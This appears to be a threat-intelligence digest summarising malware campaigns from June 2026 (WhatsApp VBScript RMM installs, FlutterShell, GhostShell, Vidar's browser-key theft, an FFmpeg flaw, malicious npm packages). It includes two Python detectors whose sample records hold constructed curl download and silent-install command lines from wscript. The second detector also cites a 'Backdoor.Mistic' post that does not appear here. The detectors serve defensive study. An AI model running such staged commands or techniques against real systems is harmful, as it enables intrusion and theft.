The EvilTokens campaign represents a notable evolution in phishing tactics, utilizing a Phishing-as-a-Service (PhaaS) model that specifically targets users of Microsoft 365. This attack vector is marked by its sophisticated integration of device-code phishing, which allows it to operate under the guise of trusted brands like DocuSign and Adobe. Through the use of disposable Cloudflare Workers infrastructure, the campaign effectively circumvents standard security measures, making traditional static blocklisting approaches less effective against it.
A critical characteristic of the EvilTokens campaign is its ability to bypass both password and multi-factor authentication (MFA). Attackers exploit the legitimate Microsoft page for device approval, enabling victims to unknowingly approve the malicious device. This approach is particularly concerning as it leverages stolen refresh tokens, granting persistent access to attackers that remains viable even after victims reset their passwords. The campaign's impact is magnified by its focus on mobile devices, which are increasingly used to open phishing links. Mobile devices typically have weaker endpoint security controls, making them more susceptible to these types of attacks.
In response to these threats, Zimperium’s Mobile Threat Defense (MTD) solution has been effective in detecting and blocking the malicious URLs associated with EvilTokens at the mobile device level. This preemptive measure stops users from reaching the critical phishing step where device codes are entered. Moreover, ongoing research has led to the identification of numerous new domains associated with the EvilTokens phishing kit, indicating a broader compromise landscape. Indicators of compromise (IOCs) related to these domains are publicly accessible for further investigation, enabling organizations to strengthen their defenses against such sophisticated phishing threats.

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
windows: 1, schema: 1

#threatreport #MediumCompleteness
WhatsApp VBScript Campaign Installs ManageEngine Endpoint Central for Persistent Remote Access | 23-06-2026
Source: socradar.io/blog/whatsapp-…
Key details below ↓
💀Threats:
Bitsadmin_tool, Motw_bypass_technique, Gh0st_rat, Valleyrat
🎯Victims: Consumers, Organizations
🌐Geo: Malaysia, Spain, French, Mexico, Australia, Vietnam, Brazil, India, Taiwan, Russia, Chinese, German, Singapore, Portuguese
📚TTPs:
⚔️Tactics: 1
🛠️Technics: 0
🤖LLM extracted TTPs:
T1027, T1036, T1036.008, T1059.005, T1105, T1112, T1218.007, T1219, T1548.002, T1553.005, ...
🧨IOCs:
- File: 12
- IP: 6
💽Software: WhatsApp, curl
🔢Algorithms: zip
📜Programming Languages: powershell, vbscript
#threatreport:
The WhatsApp VBScript campaign represents a socially engineered cyber attack wherein attackers distribute a malicious VBScript payload through hijacked WhatsApp accounts. This campaign targets a broad range of victims across multiple countries, with a notable concentration in Malaysia, which accounts for around 80% of reported incidents. The attackers seek to install ManageEngine Endpoint Central, a legitimate enterprise remote management tool, to maintain persistent control over compromised systems by exploiting the common use of WhatsApp for communication in corporate environments.
The initial stage of the attack involves using obfuscation techniques to make the VBScript payload appear benign. Attackers employ localized filenames and Windows Update-themed comments to trick users into executing the scripts. The VBScript can obfuscate its operations through methods like string concatenation, encoded content, and mimicking legitimate Windows utilities such as curl or bitsadmin, which are renamed and used to fetch additional malicious payloads.
In the second stage, the attack escalates as the script creates a randomized hidden directory within the system, facilitating the download of a ZIP file containing further scripts. By leveraging various methods including PowerShell and curl, the attacker extracts and executes these scripts while attempting to remove metadata that may trigger security warnings.
The final stage involves the silent installation of the ManageEngine Endpoint Central agent, allowing adversaries to perform remote administration without triggering typical red flags associated with malicious binaries. Although the campaign exhibits certain characteristics that may suggest the involvement of a Chinese-speaking threat actor, no definitive attribution has been established. The presence of certain IP addresses previously linked to other malware families does not conclusively identify a single operator.
This campaign raises new challenges for cybersecurity teams, as it blurs the lines between legitimate software and malicious activity, complicating detection and response efforts. Detection strategies should focus on unusual executions of wscript.exe, suspicious directory creations, and the monitoring of registry writes associated with privilege escalation. It is vital to impose network controls to block known malicious domains and scrutinize unexpected outbound connections to storage services frequently used for hosting payloads.
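Process-creation triage for the chain described above: a script host running a .vbs from a user-writable path, a renamed curl or bitsadmin (on-disk name differs from OriginalFileName) or PowerShell spawned by that script host, and a silent msiexec install launched from the script (the post's TTP list includes T1218.007). Added example, not SOCRadar's detection logic; the records use Sysmon Event ID 1 field names, the events, paths and the example.invalid host are constructed.

```python
"""Flag process-creation records matching the WhatsApp VBScript chain.
Added example over constructed Sysmon Event ID 1-style records."""
import json
import re
import sys

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "powershell.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")
SCRIPT_ARG = re.compile(r'"([^"]+\.(?:vbs|vbe|js|jse|wsf))"|(\S+\.(?:vbs|vbe|js|jse|wsf))', re.I)
SILENT_MSI = re.compile(r"/q[nb]?\b|/quiet", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def script_argument(cmdline: str):
    """First script-file argument on the command line, quoted or bare."""
    m = SCRIPT_ARG.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def evaluate(ev: dict) -> list:
    """Reasons one record matches the chain; [] if none."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    original = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "")
    reasons = []
    if image in SCRIPT_HOSTS:
        script = script_argument(cmd)
        if script and in_user_writable(script):
            reasons.append(f"{image} running script from user-writable path")
    if original in DOWNLOADERS and image != original:  # binary renamed on disk
        reasons.append(f"renamed {original} running as {image}")
    if parent in SCRIPT_HOSTS and (image in DOWNLOADERS or original in DOWNLOADERS):
        reasons.append(f"{original or image} spawned by {parent}")
    if parent in SCRIPT_HOSTS and image == "msiexec.exe" and SILENT_MSI.search(cmd):
        reasons.append(f"silent msiexec install launched by {parent}")
    return reasons


def detect(events: list) -> list:
    """[(index, reasons)] for every record evaluate() flags."""
    return [(i, r) for i, ev in enumerate(events) if (r := evaluate(ev))]


# Constructed records (not the report's IOCs); the localized script name and the
# example.invalid host are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\ana\Downloads\Kemaskini_Windows.vbs"'},
    {"Image": r"C:\Users\ana\AppData\Local\Temp\svc.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"svc.exe -s -o C:\Users\ana\AppData\Local\Temp\d\pkg.zip https://storage.example.invalid/pkg"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -sI https://www.example.com/"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\ana\AppData\Local\Temp\d\agent.msi" /qn'},
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'wscript.exe "C:\Program Files\Vendor\Tools\cleanup.vbs"'},
]

if __name__ == "__main__":
    if len(sys.argv) > 1:  # one JSON object per line, Sysmon Event ID 1 field names
        with open(sys.argv[1], encoding="utf-8") as fh:
            events = [json.loads(line) for line in fh if line.strip()]
    else:
        events = SAMPLE_EVENTS
    for idx, reasons in detect(events):
        print(idx, "; ".join(reasons))
```

The benign records (curl from cmd.exe, a vendor script under Program Files) produce nothing, so the parent-child and path conditions, not the binary names alone, carry the detection.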

#threatreport #MediumCompleteness
Operation FlutterBridge: The FlutterShell macOS Backdoor | 23-06-2026
Source: levelblue.com/blogs/spiderla…
Key details below ↓
🧑💻Actors/Campaigns:
Cl-cri-1089
💀Threats:
Flutterbridge, Fluttershell, Sparkle_tool, Typosquatting_technique
🎯Victims: Macos users, Google chrome users
📚TTPs:
⚔️Tactics: 7
🛠️Technics: 12
🧨IOCs:
- File: 6
- Domain: 1
- Hash: 9
💽Software: macOS, Flutter, Chrome, Google Chrome, flutter.flutter, Gatekeeper, Unix
🔢Algorithms: sha256
🔠Functions: setSparkleDelay
📜Programming Languages: javascript, objective_c
💻Platforms: apple, x86, arm
#threatreport:
Operation FlutterBridge has been identified as a sophisticated cyber campaign leveraging the Flutter framework to deploy macOS malware, specifically the FlutterShell backdoor. The malware operates by utilizing several Mach-O samples, demonstrating an evolution across three distinct generations. Key technical insights include its ability to maintain detection capabilities despite changes in command names and other identifiers, by separating the static binary from the command payload. At runtime, a WebView loads attacker-controlled content, allowing commands to be issued through a JavaScript message channel known as FlutterInvoke.
Remarkably, the malware exhibits a conditional execution model reliant on a Command and Control (C2) server. The absence of any visible malicious behavior in the sandbox indicates that the malware remains inactive without a live C2 response. This behavior underscores the necessity for endpoint-level telemetry as the primary detection method, given that conventional behavioral sandboxes cannot simulate live C2 interactions.
Further analysis reveals shared structural properties across multiple payloads, such as identical exported-symbol fingerprints and consistent architecture. The deployments utilize a two-component architecture, with a stub launcher initiating a larger dynamically linked payload library housing the Dart runtime and the malicious logic. Each payload links exclusively to system libraries like libSystem.B.dylib, bypassing standard Apple frameworks, which helps differentiate it from legitimate macOS applications.
The operational strategy of the threat actor includes techniques like certificate rotation to circumvent Apple's Gatekeeper protections. Earlier generations leveraged valid Apple certificates to pass initial scrutiny, but subsequent variants have switched to self-signed artifacts for greater evasion capabilities. This approach allows the attacker to bypass revocation mechanisms effectively.
The attack vector typically involves targeting users through Google/YouTube ads with keywords related to common applications, such as podcast apps or PDF converters. Victims are redirected to typosquatted domains, where they download signed app bundles that appear legitimate. Once installed, the app deceptively presents a functional interface while establishing a connection to the attacker’s domain for command execution.
Specific insights also highlight payload behaviors such as attempts to modify Chrome's default search provider and suppress browser warning messages, as well as silent replacement of application bundles during update cycles. The unique attributes and operational behaviors observed in the FlutterShell malware create distinct defensive markers that can be monitored to detect anomalous activities tied to this malicious campaign.

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
schema: 1, windows: 1, code: 10

#threatreport #MediumCompleteness
A VBScript campaign distributed through WhatsApp deploying RMM software | 22-06-2026
Source: securelist.com/whatsapp-vbs-r…
Key details below ↓
💀Threats:
Bitsadmin_tool, Gh0st_rat, Valleyrat,
🎯Victims: Individual users, Whatsapp users, Consumers
🏭Industry: Financial
🌐Geo: Russia, German, Taiwan, Singapore, French, Chinese, Mexico, Brazil, Vietnam, Australia, Portuguese, Malaysia, Spain, India
📚TTPs:
⚔️Tactics: 1
🛠️Technics: 0
🤖LLM extracted TTPs:
T1036, T1036.003, T1059.001, T1059.005, T1105, T1204.002, T1219, T1553.005, T1564.001, T1566.003, ...
🧨IOCs:
- File: 41
- Path: 1
- IP: 6
- Hash: 41
- Domain: 8
💽Software: WhatsApp, curl
🔢Algorithms: zip
📜Programming Languages: powershell
#threatreport:
In June 2026, a malware campaign emerged, utilizing malicious VBScript files disseminated via WhatsApp direct messages. The campaign predominantly impacted users in Malaysia, with other affected regions including Brazil, India, Mexico, Singapore, the UK, Spain, Taiwan, Australia, Russia, and Vietnam. The primary vector for infection was WhatsApp Desktop and WhatsApp Web, where deceptive file names mimicking legitimate business documents coaxed users into executing the attachments. The VBScript triggers a multi-stage infection process culminating in the installation of Remote Monitoring and Management (RMM) software, allowing attackers remote access to the victim's system.
Analysis revealed that the threat actors compromised several WhatsApp accounts, employing these stolen credentials to spread the malware through contacts. Malicious attachments were sent without additional context, increasing the likelihood of user engagement. The file names used were often financial in nature, designed to exploit social engineering vulnerabilities—examples included terms like invoices, account statements, and debt notices, localized into various languages.
The initial attack stage features a VBScript that, when launched via Windows Script Host (WScript.exe), creates a working directory under C:\Users\Public\Documents. It downloads further payloads from attacker-controlled sources. Early variants of the malware employed Windows utilities such as curl.exe and bitsadmin.exe, with files renamed to resemble DLLs to minimize user detection. Additional stages see the initial script downloading two more VBScript files; one seeks to modify User Account Control (UAC) settings, while the other downloads a ZIP file containing the RMM software installation package. Each downloader creates its directory with randomized names and often applies hidden attributes to obscure content from the user's view.
The installation process utilizes administrative privileges to ensure successful deployment of the RMM agent, indicating a sophisticated level of planning from the threat actors. Notably, the campaign’s infrastructure has shown potential links to previously identified malware such as ValleyRAT and Gh0st RAT, though definitive attribution remains uncertain. Analysis noted consistent Chinese-language comments across scripts, suggesting the involvement of a possible Chinese-speaking threat actor; however, the evidence is not robust enough for conclusive attribution.
Victimology data indicates that the campaign predominantly targets individual users rather than organizations, with a broad and opportunistic approach manifested. Users are advised to exercise caution with unexpected attachments, even from recognized contacts, particularly with script or executable file types, which should only be opened after verifying their legitimacy.
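
Detection logic for the chain described in this post (script host launched on a .vbs from the messaging client, a working directory under C:\Users\Public\Documents, curl.exe/bitsadmin.exe output renamed to .dll, hidden attributes, UAC policy writes) and for the wscript.exe, directory-creation and registry-write focus of the Backdoor.Mistic post above. This is an added example, not code from either report: the event records are constructed, Sysmon-like and simplified, the rule names are ours, and the UAC registry value names are an assumption since the report does not say which values the script changes.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One constructed endpoint record (Sysmon-like, reduced to the fields the rules use)."""
    kind: str            # "process" = process creation, "dir" = directory created, "reg" = value set
    image: str           # image path of the process performing the action
    parent: str = ""     # parent image path (process events only)
    cmdline: str = ""    # full command line (process events only)
    target: str = ""     # created directory or written registry value (dir/reg events only)


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe"}          # the LOLBin downloaders the report names
STAGING_ROOT = r"c:\users\public\documents"           # the working-directory parent the report names
# UAC settings live under this policy key; which values the second-stage VBS changes is not
# stated in the report, so the value names below are an assumption covering the common ones.
UAC_POLICY_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system"
UAC_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_id, evidence) pairs for events matching the campaign's stages."""
    hits = []
    for e in events:
        img, par, cmd = _base(e.image), _base(e.parent), e.cmdline.lower()
        if e.kind == "process":
            # Stage 1: a script host runs a .vbs that arrived through the messaging client.
            if img in SCRIPT_HOSTS and ".vbs" in cmd and ("\\downloads\\" in cmd or "whatsapp" in cmd):
                hits.append(("VBS_FROM_DOWNLOADS", e.cmdline))
            # Stage 2: the script host spawns a LOLBin downloader; output named .dll is the strongest form.
            if par in SCRIPT_HOSTS and img in DOWNLOADERS:
                rule = "LOLBIN_DL_AS_DLL" if re.search(r"\.dll\b", cmd) else "LOLBIN_DL_FROM_SCRIPT"
                hits.append((rule, e.cmdline))
            # Stage 3: the staging directory is hidden with attrib +h.
            if par in SCRIPT_HOSTS and img == "attrib.exe" and "+h" in cmd:
                hits.append(("HIDE_STAGING_DIR", e.cmdline))
        elif e.kind == "dir":
            # Working directory created by a script host under C:\Users\Public\Documents.
            if img in SCRIPT_HOSTS and e.target.lower().startswith(STAGING_ROOT + "\\"):
                hits.append(("PUBLIC_DOCS_STAGING", e.target))
        elif e.kind == "reg":
            # A script host writing UAC policy values (the second-stage VBS in the report).
            key, _, value = e.target.lower().rpartition("\\")
            if img in SCRIPT_HOSTS and key == UAC_POLICY_KEY and value in UAC_VALUES:
                hits.append(("UAC_POLICY_WRITE", e.target))
    return hits


def triage(events):
    """Roll hits up into one verdict: three or more distinct stages on a host is the full chain."""
    hits = detect(events)
    stages = sorted({rule for rule, _ in hits})
    verdict = "vbs-rmm-chain" if len(stages) >= 3 else ("suspicious" if stages else "clean")
    return {"verdict": verdict, "stages": stages, "hits": hits}


# Constructed telemetry modelled on the behaviour described in the report (not real IoCs).
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\wscript.exe", parent=r"C:\Windows\explorer.exe",
          cmdline=r'"C:\Windows\System32\WScript.exe" "C:\Users\ana\Downloads\WhatsApp\Invoice_0626.vbs"'),
    Event("dir", r"C:\Windows\System32\wscript.exe", target=r"C:\Users\Public\Documents\kq7f2m"),
    Event("process", r"C:\Windows\System32\curl.exe", parent=r"C:\Windows\System32\wscript.exe",
          cmdline=r"curl.exe -s -o C:\Users\Public\Documents\kq7f2m\upd.dll http://files.example.net/a"),
    Event("process", r"C:\Windows\System32\attrib.exe", parent=r"C:\Windows\System32\wscript.exe",
          cmdline=r"attrib +h +s C:\Users\Public\Documents\kq7f2m"),
    Event("reg", r"C:\Windows\System32\wscript.exe",
          target=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"),
    # Benign: curl run from an interactive shell, not from a script host; must not fire.
    Event("process", r"C:\Windows\System32\curl.exe", parent=r"C:\Windows\System32\cmd.exe",
          cmdline=r"curl.exe -O https://example.com/file.txt"),
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    print(result["verdict"], result["stages"])
    for rule, evidence in result["hits"]:
        print(f"  {rule:22} {evidence}")
```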

#threatreport #HighCompleteness
GhostShell (MB-0009): Targeting Ukraine’s UAV Operations and Defense Supply Chain | 22-06-2026
Source: blog.synapticsystems.de/ghostshell-mb-…
Key details below ↓
🧑💻Actors/Campaigns:
Uac-0244
Gamaredon
💀Threats:
Supply_chain_technique, Ghostshell, Kraken_cryptor, Mantis_botnet, Metasploit_tool, Process_injection_technique, Xray_tool, Native_loader, Vidar_stealer, Dead_drop_technique, Antidebugging_technique, Spear-phishing_technique,
🎯Victims: Ukraine, Uav operations, Drone supply chain, Military units, Technical personnel, Procurement staff, Volunteer organizations, Defense sector partners
🏭Industry: Healthcare, Military
🌐Geo: Ukraine, Kazakhstan, Ukraines, Moldova, Russia, German, Germany, Spain, Ukrainian
🔓CVEs: CVE-2025-8088 [Vulners](vulners.com/cve/CVE-2025-8…)
- CVSS V3.1: *8.8*,
- Vulners: Exploitation: True
Soft:
- rarlab winrar (<7.13)
CVE-2025-6218 [Vulners](vulners.com/cve/CVE-2025-6…)
- CVSS V3.1: *7.8*,
- Vulners: Exploitation: True
Soft:
- rarlab winrar (<7.12)
📚TTPs:
⚔️Tactics: 7
🛠️Technics: 14
🧨IOCs:
- File: 15
- Domain: 2
- Url: 7
- Hash: 17
- IP: 6
- Path: 1
💽Software: WinHTTP, Windows Security, Telegram, Discord, Steam, Outlook, curl, nginx
🔢Algorithms: ecdh, sha256, ecdsa, base64, xor, aes-256-gcm, aes-256-cbc, md5, gzip
🔠Functions: GetComputerName, GetUserName, CreateFile, GetTempPath
🗂️Win API: VirtualAlloc, VirtualProtect, LoadLibrary, GetProcAddress, WinHttpSetOption, GdiplusStartup, GetDC, CreateCompatibleBitmap, BitBlt, CreateProcess, ...
⚙️Win Services: bits
📜Programming Languages: visual_basic, python, golang
💻Platforms: x64
#threatreport:
The GhostShell malware campaign, labeled as MB-0009, has been observed targeting Ukraine's UAV operations and defense supply chain since February 2026. This new threat actor has not been correlated with previously known groups, differentiating its activities through a specific attack infrastructure and methodology. The malware exploits vulnerabilities CVE-2025-8088 and CVE-2025-6218 to deliver malicious payloads disguised in a RAR archive named “Besomar_documentation.rar,” which mimics legitimate documentation associated with the Ukrainian drone manufacturer Besomar. The targeted entities include military units and various defense-sector personnel, indicating a focus on operational access and supply chain intelligence.
The primary components of the malware's architecture involve a multi-stage infection process. The RAR archive drops a Visual Basic Script (VBS) file into the Windows Startup folder, ensuring persistence through the use of relative path traversal. This VBS file subsequently downloads additional executables—122.exe and update.exe—from a command and control (C2) domain, cloudaxis.cc. The behavior of these payloads points to sophisticated evasion techniques, including checks for sandboxes and the use of mutual TLS (mTLS) for secure communication with the C2 server, which only responds to clients that present a valid client certificate.
The executable 122.exe functions as a loader utilizing a CRPT XOR overlay mechanism, capable of executing a second-stage implant directly in memory. The second-stage implant authenticates via an embedded elliptic-curve mTLS client certificate, highlighting the sophisticated use of cryptography within the attack. Conversely, update.exe acts as an in-memory loader that masquerades as a Windows service while performing anti-analysis checks and fetching payloads from the C2 infrastructure. This loader retrieves subsequent shellcode and executes it in memory, effectively evading traditional detection mechanisms.
Additionally, another component, 22.exe, has been identified within this operation. It is characterized as a multi-stage launcher that utilizes AES-256-GCM encryption for configuration parameters and operates as a covert transport and proxy layer using an embedded Xray Core client. More significantly, it delivers Vidar v2, a well-known information stealer, which targets a range of sensitive user information—browser passwords, cookies, and cryptocurrency-related data—via the established proxy tunnel.
The overall structure of this malware campaign demonstrates a strategic approach to targeting high-value supply chain vulnerabilities critical to Ukraine's defense capabilities. With its emphasis on covert operation and data exfiltration, GhostShell poses a significant threat, especially given its potential connections to the geopolitical landscape surrounding the Ukraine conflict. The reported use of Telegram for C2 host resolution further illustrates the flexibility and adaptability of modern cyber threat actor methodologies, complicating traditional attribution efforts, though the presence of specific identifiers, such as the self-named "GhostShell Implant CA," could provide future avenues for analysis and detection.

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
windows: 1, schema: 1, chats: 2

#threatreport #LowCompleteness
PixelSmash – Critical FFmpeg Vulnerability Turns Media Files into Weapons | 23-06-2026
Source: jfrog.com/blog/pixelsmas…
Key details below ↓
💀Threats:
Pixelsmash_vuln, Supply_chain_technique, Lumma_stealer,
🎯Victims: Media processing applications, Media servers, Cloud storage platforms, Cloud transcoding services, Chat platforms, Network attached storage appliances, Smart televisions, Photo management platforms, Artificial intelligence and machine learning infrastructure, Linux desktop environments, ...
🏭Industry: Iot, Media
🔓CVEs: CVE-2026-8461 [Vulners](vulners.com/cve/CVE-2026-8…)
- CVSS V3.1: *8.8*,
- Vulners: Exploitation: Unknown
📚TTPs:
⚔️Tactics: 2
🛠️Technics: 0
🤖LLM extracted TTPs:
T1036, T1059.004, T1190, T1203, T1204.002, T1499.004
🧨IOCs:
- File: 5
💽Software: MagicYUV, Linux, Jellyfin, Slack, Discord, Telegram, Ubuntu, Debian, Fedora, Alpine, ...
🔠Functions: system, free
#threatreport:
A critical vulnerability has been identified in FFmpeg's MagicYUV decoder, designated CVE-2026-8461, which allows for remote code execution through specially crafted media files. This vulnerability results from a heap out-of-bounds write, with a CVSS score of 8.8, and affects numerous applications utilizing FFmpeg, including media processors like Kodi, Jellyfin, and Nextcloud. The issue can be triggered by merely processing a maliciously designed AVI, MKV, or MOV file, leading to crashes of affected applications and, in some cases, to full remote code execution.
To exploit the vulnerability, an attacker must deliver a carefully crafted media file to any software that decodes video using FFmpeg’s libavcodec. This can occur through desktop applications when a user opens a malicious file or when a file is uploaded to a media server, where automatic processing would trigger the vulnerability. Notably, the attack does not require any advanced permissions or user interactions beyond the initial file delivery, making it highly dangerous and exploitable through various means, including torrent downloads that automatically place files in watched directories.
The underlying cause of the vulnerability can be traced back to a rounding mismatch within the MagicYUV decoder's slice handling code. The error lies in improper validation of slice height, allowing attackers to manipulate buffer memory. The implications are serious, resulting not only in application crashes but potentially in arbitrary command execution, demonstrated through successful exploits on Jellyfin, where an attacker gained execution rights through normal media library scanning routines.
The impact of PixelSmash extends widely due to FFmpeg's pervasive integration into applications across the software ecosystem, making it a supply chain vulnerability. Since FFmpeg's libavcodec is a core dependency for numerous projects, many developers do not conduct thorough audits of its codec implementations, leading to silent propagation of this critical flaw into various downstream applications.
Real-world exploitation scenarios also illustrate the ease with which attackers can leverage the vulnerability. The automatic metadata extraction during media uploads to services like Nextcloud and Jellyfin, combined with how damage is executed without alerting administrators, poses significant operational risks. Systems running ongoing FFmpeg services could remain compromised without indication, allowing for potential cost-inefficient exploitation in cloud environments due to the nature of the attack.
Additionally, new attack surfaces emerge in AI/ML infrastructures that process video inputs, suggesting further research into similar vulnerabilities in systems employing libavcodec for untrusted video data. It is imperative for systems that rely on FFmpeg to promptly update to patched versions or disable the vulnerable MagicYUV decoder to mitigate associated risks. This incident highlights the necessity for organizations to scrutinize their software supply chains for vulnerabilities lurking within dependencies, which can manifest severe security ramifications without direct developer involvement.

#threatreport #MediumCompleteness
Crypto Clipper uses Tor and worm-like propagation for persistence and control | 18-06-2026
Source: microsoft.com/en-us/security…
Key details below ↓
💀Threats:
Cryptobandits, Pyarmor_tool, Contebrew,
🎯Victims: Cryptocurrency users, Organizations, End users
📚TTPs:
⚔️Tactics: 7
🛠️Technics: 8
🧨IOCs:
- File: 3
- Hash: 16
💽Software: Microsoft Defender, Microsoft Defender for Endpoint, Curl, PyInstaller, Task Scheduler
📲Wallets: tron
🪙Crypto: ethereum, bitcoin, monero
🔢Algorithms: sha256
📜Programming Languages: powershell, jscript, php, python, javascript
#threatreport:
A newly identified cryptocurrency clipper malware has been active since February 2026, exploiting Windows environments to conduct clipboard theft, screen capture, and cryptocurrency address substitution. This malware, referred to as a crypto clipper, operates without traditional installation methods and utilizes a Windows Script Host along with ActiveX to activate a bundled Tor client for command and control (C2) communications. Notably, it avoids using static IP infrastructure, opting instead for a more discreet Tor-based method.
The malware employs a two-component architecture: a worm that ensures its propagation by creating malicious shortcuts of legitimate files on compromised devices and a clipper component that targets cryptocurrency-related data. The worm's ability to generate malicious shortcuts linked to executable payloads facilitates stealthy infection processes while maintaining resilience against detection, especially through Microsoft Defender.
Upon execution, the first stage of the clipper checks for running processes to evade execution within an environment that exhibits analysis tools, such as Task Manager. Following successful checks, it establishes communication with a hidden C2 server via a local Tor proxy, polling for instructions and continuously monitoring the clipboard for cryptocurrency wallet addresses and sensitive information, including seed phrases and private keys.
Defensively, the malware employs a multi-layered obfuscation strategy that complicates static analysis, using techniques such as Python-based obfuscation and encrypted components decrypted only at runtime. The operation minimizes visibility into its actions by routing traffic through localhost, obscuring the final destination, and enhancing anonymity for the attackers.
Command and control is facilitated through a local interface that allows the malware to receive and execute commands. Among its notable actions, it specifically captures clipboard data related to cryptocurrencies, applying custom rules to replace legitimate addresses copied by users with those under the control of the attackers. The malware also captures screenshots at regular intervals, providing further context for the threat actor concerning the user's activities.
The clipper's inherent persistence mechanisms involve creating scheduled tasks to ensure both the worm and stealer components remain operational even after system reboots. Key behaviors of this malware include clipboard monitoring and exploitation of symbolic links, further complicating detection efforts.
Organizations aiming to mitigate threats of this nature should focus on tightening script execution policies, monitoring traffic for misuse of local SOCKS proxies, and employing behavioral analysis to link suspicious script activities to potential exfiltration or infiltration signs. The combination of these approaches offers a proactive path to identifying and thwarting similar lightweight, yet impactful threats in real-time.

#threatreport #LowCompleteness
Inside Vidar’s ABE Bypass: From Memory Scanning to APC Injections | 18-06-2026
Source: gendigital.com/blog/insights/…
Key details below ↓
💀Threats:
Vidar_stealer, Remus, Lumma_stealer, Voidstealer, Apc_injection_technique,
🎯Victims: Web browsers
🤖LLM extracted TTPs:
T1055.004, T1057, T1106, T1518.001, T1555.003
🧨IOCs:
- File: 1
- Hash: 1
💽Software: Chromium
🔢Algorithms: aes-256-gcm
🔠Functions: APC
🗂️Win API: CryptProtectData, CryptProtectMemory, CryptUnprotectMemory, NtCreateProcessEx, OpenProcess, CreateDesktopA, NtQueryVirtualMemory, NtReadVirtualMemory, CreateRemoteThread, NtTestAlert, ...
#threatreport:
Vidar, an actively developed information-stealer, has introduced innovative techniques to bypass Application-Bound Encryption (ABE), particularly aimed at extracting the v20_master_key from browser memory. This key is crucial for decrypting any ABE-protected data associated with specific applications. Vidar's method parallels techniques used by other malware, but it achieves its goals through a unique process. Instead of seeking the key from the disk—where it is protected by multiple layers of encryption—Vidar targets the browser's memory.
The process begins by identifying the target browser, which Vidar can do from an already running instance or by creating a new one. It forks the existing browser process without directly reading its memory, instead capturing a static snapshot via `NtCreateProcessEx`. If the target browser is not running, Vidar initiates a new browser session on an isolated desktop, implementing specific command-line arguments to optimize conditions for its tactics. Following this, Vidar enumerates the memory of the forked process, using `NtQueryVirtualMemory`, to identify relevant memory regions fitting its criteria (committed, private, and either readable or read-write).
Vidar employs a distinctive pattern search for the encrypted v20_master_key using a predefined 32-byte signature, targeting internal node structures, specifically within the Chromium's Encryptor::KeyRing framework. Upon locating potential candidates for the key, the malware must overcome the challenge that the decryption of the key can only occur within the browser's context due to CryptProtectMemory protections.
To facilitate this, Vidar uses Asynchronous Procedure Calls (APC) to inject code into the live browser process. The choice of injection method is contingent upon the presence of certain antivirus products, such as ESET or Bitdefender. If either of these is detected, Vidar uses a classic approach to queue an APC after creating a suspended thread. If not detected, it employs a special method leveraging existing threads to execute an APC immediately without requiring the thread to be in an alertable state.
When the APC executes, `CryptUnprotectMemory` decrypts the key in place. Vidar verifies successful decryption by forking the browser process again and comparing values before and after the APC call. It then attempts to use the decrypted key to authenticate entries by scanning for the byte sequence characteristic of ABE data. If the key successfully decrypts data entries, Vidar preserves the updated state of the key in memory using `CryptProtectMemory`. Conversely, if decryption fails across attempts, it terminates and restarts the browser before repeating the entire process.
Through its use of APC injections, which can be seen as less common and potentially stealthy, Vidar seeks to trade off traditional detection methods, continuously evolving its strategies to bypass ABE defenses and maintain its efficacy as an infostealer.

#threatreport #MediumCompleteness
Five npm Packages That Hide a Windows Binary Dropper | 17-06-2026
Source: safedep.io/procwire-npm-w…
Key details below ↓
💀Threats:
Bitsadmin_tool, Motw_bypass_technique, Lolbin_technique,
🎯Victims: Software supply chain, Windows users
📚TTPs:
⚔️Tactics: 2
🛠️Technics: 0
🤖LLM extracted TTPs:
T1027, T1036, T1036.005, T1059.001, T1059.003, T1059.007, T1082, T1105, T1140, T1195.001, ...
🧨IOCs:
- File: 13
- Url: 3
- Email: 2
- Path: 1
- Command: 3
- Domain: 1
💽Software: Node.js, curl
🔢Algorithms: xor
🔠Functions: createServer
📜Programming Languages: powershell
#threatreport:
A recent cybersecurity analysis unveiled a sophisticated attack campaign utilizing five npm packages to deploy a Windows binary dropper. Launched on June 16, 2026, the campaign involved two weaponized packages: procwire@1.3.0, which functions as a Windows binary dropper, and routecraft@4.2.0, posing as an Express clone that incorporates procwire on Windows systems. The remaining three packages serve as tools for the operator, including bytecraft (a XOR utility), endpointmap (which encodes command-and-control [C2] URLs), and staticlayer (a server-side component for the dropper).
